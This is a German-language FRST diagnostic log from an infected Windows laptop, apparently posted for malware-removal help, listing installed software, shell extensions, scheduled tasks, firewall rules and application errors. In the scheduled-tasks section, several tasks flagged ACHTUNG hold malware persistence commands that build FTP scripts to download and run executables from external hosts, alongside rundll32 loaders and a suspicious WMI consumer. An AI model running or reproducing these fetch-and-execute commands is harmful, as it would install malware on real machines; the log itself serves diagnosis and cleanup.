Acer Crystal Eye Webcam (HKLM-x32\...\{7760D94E-B1B5-40A0-9AA0-ABF942108755}) (Version: 5.2.19.3 - Suyin Optronics Corp)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3013 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.01.3003 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.03.3003 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0804.2010 - Acer Incorporated)
Acer Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.02.3001 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\{E5EABF66-F9C4-430C-B97D-3CF28A58D50B}) (Version: 1.3.17.05006 - Alcor Micro Corp.) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{E5EABF66-F9C4-430C-B97D-3CF28A58D50B}) (Version: 1.3.17.05006 - Alcor Micro Corp.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.33 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{B36047D4-E932-C4B2-0DF2-94C8577468A9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Backup Manager Basic (HKLM-x32\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.68 - NewTech Infosystems) Hidden
ccc-core-static (HKLM-x32\...\{7225AFBA-5C8D-90EB-B768-8B10EC636757}) (Version: 2010.0605.2309.39762 - Ihr Firmenname) Hidden
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
Inkscape 0.48.0 (HKLM-x32\...\Inkscape) (Version: 0.48.0 - )
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.14 - Acer Inc.)
MediaShow Espresso (HKLM-x32\...\{4968622A-4D3F-489E-9ACE-5FEC4CC0BDE3}) (Version: 5.5.1403_23691 - CyberLink Corp.) Hidden
Micrografx Picture Publisher 10 (HKLM-x32\...\{04AABF6D-55C5-4779-ABF9-992016E913A2}) (Version: 1.0.0.0 - Micrografx, Inc.)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{0D7CD0D9-4A88-4A63-8F91-3F4E8F371768}) (Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems)
NTI Backup Now Standard (HKLM-x32\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems)
PX Profile Update (HKLM-x32\...\{D1079D9F-7778-366C-AA9F-F3AC68EC8141}) (Version: 1.00.1. - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6050 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shredder (HKLM\...\{1F557316-CFC0-41BD-AFF7-8BC49CE444D7}) (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Shredder (HKLM-x32\...\{C2695E83-CF1D-43D1-84FE-B3BEC561012A}) (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Snagit 9.1 (HKLM-x32\...\{0E6ED660-498C-42F7-9EF4-FB0C96DFC01A}) (Version: 9.1.0.206 - TechSmith Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.12.0 - Synaptics Incorporated)
Überwachungstool für die Intel® Turbo-Boost-Technik (HKLM\...\{39F4C6F9-618A-4E5B-8FB2-6BD661174E32}) (Version: 1.0.186.6 - Intel)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 5.0.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 5.0.1 - VMware, Inc)
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3004 - Acer Incorporated)
Windows Live Anmelde-Assistent (HKLM-x32\...\{52B97218-98CB-4B8B-9283-D213C85E1AA4}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{586509F0-350D-48B5-B763-9CC2F8D96C4C}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live-Uploadtool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll [2010-05-27] (Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\mwlshellext.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitShellExt64.dll [2008-11-06] (TechSmith Corporation)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2012-11-01] (VMware, Inc.)
ContextMenuHandlers3: [ShredderContextMenu] -> {521065F1-DE6C-4E46-BBCB-89B0D0BE860D} => C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll [2010-04-02] (Egis Technology Inc.)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\mwlshellext.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitShellExt64.dll [2008-11-06] (TechSmith Corporation)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2010-06-06] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-06-05] (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0247DDA6-66A8-4ABB-9768-71796027B405} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ACHTUNG
Task: {0B1F3F91-2689-4F5C-854E-7A0B6E233FC7} - System32\Tasks\{43196D44-4B99-47B4-B0EC-DDFE69954C12} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {11FD25BC-02EC-4C04-998E-6A2744F45961} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ACHTUNG
Task: {172CA117-81F3-496A-BEC5-854ADC0292A8} - System32\Tasks\{2E9D12B7-53DA-444A-AF13-5D8BB748B7E6} => C:\Program Files (x86)\Micrografx\Picture Publisher 10\Pp10.exe [2001-09-17] ()
Task: {19CDCFDB-77D8-45F8-A470-CBE53E2AEC6F} - System32\Tasks\{0B49C5FD-F9D9-4334-BF14-DD41347EA35C} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {669B4C8B-4E97-48DF-9CDE-B141DBB40C30} - System32\Tasks\{FE746BE6-1F18-489C-911E-47288FEDC11C} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {7CBB404C-EA2B-4FC1-9136-F2E27B90A67F} - System32\Tasks\{60959579-FE2D-427C-ABE9-B79FEF4451B2} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {95E34C51-2FE4-4682-99B6-400BBF6BDCCF} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {ADD7EAEC-7E96-4357-9D15-CBE3E01E5905} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe <==== ACHTUNG
Task: {EA6BB3C4-639B-4FAF-8E78-36BA9DB4971C} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ACHTUNG

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2010-11-03 02:20 - 2010-02-03 10:37 - 000244904 ____N () C:\Program Files (x86)\Cyberlink\Shared files\RichVideo.exe
2010-06-29 00:20 - 2010-06-29 00:20 - 000465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-06-29 00:12 - 2010-06-29 00:12 - 001081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2012-11-01 03:34 - 2012-11-01 03:34 - 001260184 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2010-09-08 10:17 - 2009-05-20 08:02 - 000072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\Temp:0B9176C0 [244]
AlternateDataStreams: C:\ProgramData\Temp:4D066AD2 [240]
AlternateDataStreams: C:\ProgramData\Temp:5D7E5A8F [290]
AlternateDataStreams: C:\ProgramData\Temp:798A3728 [238]
AlternateDataStreams: C:\ProgramData\Temp:CDFF58FE [288]
AlternateDataStreams: C:\ProgramData\Temp:E1F04E8D [260]
AlternateDataStreams: C:\ProgramData\Temp:E36F5B57 [272]
AlternateDataStreams: C:\ProgramData\Temp:E3C56885 [240]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4004736709-471984187-2621406794-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\a_omuell\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 83.169.186.161 - 83.169.186.225
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{29CFBFA6-D0C9-4D1F-BCCA-DC1A79A0A62F}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe
FirewallRules: [{B2BA4C44-1E2B-44D7-9DDA-98AFFE63C879}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
FirewallRules: [{54472E90-D9B7-475C-A695-6DAE862C081F}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe
FirewallRules: [{907AA42A-5D3E-4186-AA2F-6BFF370CD11C}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
FirewallRules: [{639F54AF-2600-4EAD-BCC7-78709473EDBC}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{B5B8E26F-BCB3-4013-9805-C9AECCDDAF62}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{BC38C87B-0D24-44AD-8D10-F639EC23717C}] => (Allow) svchost.exe
FirewallRules: [{CDA8B321-8D67-4537-B8AB-BA012FCFEB0F}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{B147711E-2BD7-4998-8423-B39B833B3542}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\PowerCinema.exe
FirewallRules: [{B79495F4-3C5F-4DF2-9D79-B85B8BF4BE4B}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\PCMService.exe
FirewallRules: [{14611F0F-C0E1-4C1D-BB85-7D42CABE86A0}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{50724000-8748-44E1-B6EB-6804162204FA}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\Kernel\DMS\CLMSService.exe
FirewallRules: [{7FAED6AD-9B0A-4B7B-835A-8E546181FD02}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\HomeMedia\HomeMedia.exe
FirewallRules: [{ED1EFEE3-0C1D-4792-B24C-2BDD1DEBB754}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\TouchMovie.exe
FirewallRules: [{DFFCCBE0-856E-42DB-A826-FAE034BC2F25}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\TouchMovieService.exe
FirewallRules: [{7C23EDA1-7AB7-4F8C-940C-CAD661BD2FA9}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{21904D27-7EFC-4286-A494-127F678AF100}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{A3E447FB-A74A-4CF4-B57C-53ECDA08EAE5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0BA0D5EE-2962-4C7D-B35B-52DEC3547CE8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0B4BCF9F-9655-41CB-B152-2E0CEBD94975}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{008682FC-53B8-4221-97B4-D78AF96A2FAF}] => (Block) LPort=445
FirewallRules: [{25718DF1-4A09-4870-9A5E-9EB93C47C0B2}] => (Block) LPort=445
FirewallRules: [{3FED1C3D-F7E7-4291-A722-E5DF6F67AEC4}] => (Block) LPort=445
FirewallRules: [{245D9C6F-9FAA-4C33-A7CD-5779BED2D8A0}] => (Block) LPort=445
FirewallRules: [{5DF3CECF-E181-4E92-8AD0-F911432B44CA}] => (Block) LPort=445
FirewallRules: [{4CC02B21-69AD-4157-BBAF-2C3A65502884}] => (Block) LPort=445
FirewallRules: [{7AF19709-2262-4ADD-9449-7811E80E6179}] => (Block) LPort=445
FirewallRules: [{5EDAEA89-1A46-4215-92B2-D1F9A3E97D8E}] => (Block) LPort=445
FirewallRules: [{713B4165-D114-4FB8-89E3-30B071B675BA}] => (Block) LPort=445

==================== Wiederherstellungspunkte =========================

23-07-2017 16:45:04 Windows Update
23-07-2017 21:46:05 Windows Update
27-07-2017 20:56:25 Windows Update
27-07-2017 21:17:15 Windows Update
31-07-2017 16:20:03 Windows Update
06-08-2017 20:55:03 Windows Update
09-08-2017 21:56:55 Windows Update
12-08-2017 22:08:17 Windows Update
16-08-2017 17:20:51 Windows Update
19-08-2017 17:33:20 Windows Update
22-08-2017 19:02:23 Windows Update
24-08-2017 17:00:33 Removed Microsoft Silverlight

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/24/2017 07:49:44 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F1D17DE
Datenträgertyp: 0

Error: (08/24/2017 07:49:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xb3c
Startzeit der fehlerhaften Anwendung: 0x01d31d015dfffda5
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: 9c8525be-88f4-11e7-ad97-005056c00008

Error: (08/24/2017 04:57:10 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3FCC17DE
Datenträgertyp: 0

Error: (08/24/2017 04:57:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xe38
Startzeit der fehlerhaften Anwendung: 0x01d31ce600763d9c
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: 80c7ef28-88dc-11e7-a24e-005056c00008

Error: (08/23/2017 02:59:44 PM) (Source: Application Error) (EventID: 1005) (User: )
